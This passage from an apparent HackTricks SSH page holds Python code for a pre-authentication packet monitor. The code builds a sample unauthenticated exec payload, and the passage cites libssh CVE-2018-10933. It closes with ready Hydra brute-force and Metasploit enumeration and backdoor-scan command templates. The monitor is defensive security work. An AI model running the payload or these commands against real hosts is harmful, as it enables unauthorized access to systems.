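        pad += block
    return struct.pack(">IB", 1 + len(payload) + pad, pad) + payload + b"\x00" * pad


def split_packets(stream: bytes):
    """Yield payloads from a cleartext packet stream (what a sensor sees before key exchange)."""
    off = 0
    while off + 5 <= len(stream):
        plen, pad = struct.unpack_from(">IB", stream, off)
        yield stream[off + 5:off + 4 + plen - pad]
        off += 4 + plen


def channel_open_session(sender: int = 0) -> bytes:
    """SSH_MSG_CHANNEL_OPEN for a 'session' channel (RFC 4254 sections 5.1 and 6.1)."""
    return bytes([SSH_MSG_CHANNEL_OPEN]) + ssh_string(b"session") + struct.pack(">III", sender, 1 << 21, 1 << 15)


class PreAuthMonitor:
    """Per-connection state: connection-layer messages from the client are legal only after USERAUTH_SUCCESS."""

    def __init__(self):
        self.authenticated = False
        self.alerts = []

    def observe(self, direction: str, payload: bytes) -> bool:
        """direction is 'c2s' or 's2c'; returns True when the packet should be dropped."""
        if not payload:
            return False
        msg = payload[0]
        if direction == "s2c" and msg == SSH_MSG_USERAUTH_SUCCESS:
            self.authenticated = True
        elif direction == "c2s" and msg >= CONNECTION_LAYER_MIN and not self.authenticated:
            self.alerts.append(f"pre-auth connection-layer message {msg} ({MSG_NAMES.get(msg, '?')})")
            return True
        return False


def run(exchange) -> list:
    """Feed (direction, payload) pairs through one monitor and return its alerts."""
    mon = PreAuthMonitor()
    for direction, payload in exchange:
        mon.observe(direction, payload)
    return mon.alerts


# Constructed traffic for the example. The attack stream is what the generic steps would send
# right after the banner: CHANNEL_OPEN, then CHANNEL_REQUEST "exec" for the command "id".
ATTACK_STREAM = ssh_packet(channel_open_session()) + ssh_packet(
    bytes([SSH_MSG_CHANNEL_REQUEST]) + struct.pack(">I", 0) + ssh_string(b"exec") + b"\x01" + ssh_string(b"id"))

BENIGN_EXCHANGE = [
    ("c2s", bytes([SSH_MSG_SERVICE_REQUEST]) + ssh_string(b"ssh-userauth")),
    ("c2s", bytes([SSH_MSG_USERAUTH_REQUEST]) + ssh_string(b"noraj") + ssh_string(b"ssh-connection") + ssh_string(b"publickey")),
    ("s2c", bytes([SSH_MSG_USERAUTH_SUCCESS])),
    ("c2s", channel_open_session()),
]

if __name__ == "__main__":
    print("attack :", run(("c2s", p) for p in split_packets(ATTACK_STREAM)))
    print("benign :", run(BENIGN_EXCHANGE))
```

The same `observe` check is what a correct daemon performs internally, and it is the durable fix: a passive sensor can only apply it to the cleartext window before key exchange, so once a server negotiates keys the monitor goes blind and the only remaining signal is the server's own logging of a session that was never authenticated.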

Other Affected Implementations

  • libssh 0.6 – 0.8 (server side) – CVE-2018-10933 – accepts an unauthenticated SSH_MSG_USERAUTH_SUCCESS sent by the client, essentially the reverse logic error.

The common lesson is that any deviation from the RFC-mandated state transitions can be fatal; when reviewing or fuzzing SSH daemons pay special attention to how the state machine is enforced.


HackTricks Automatic Commands

Protocol_Name: SSH
Port_Number: 22
Protocol_Description: Secure Shell Hardening

Entry_1:
Name: Hydra Brute Force
Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh

Entry_2:
Name: consoleless msf enumeration
Description: SSH enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'
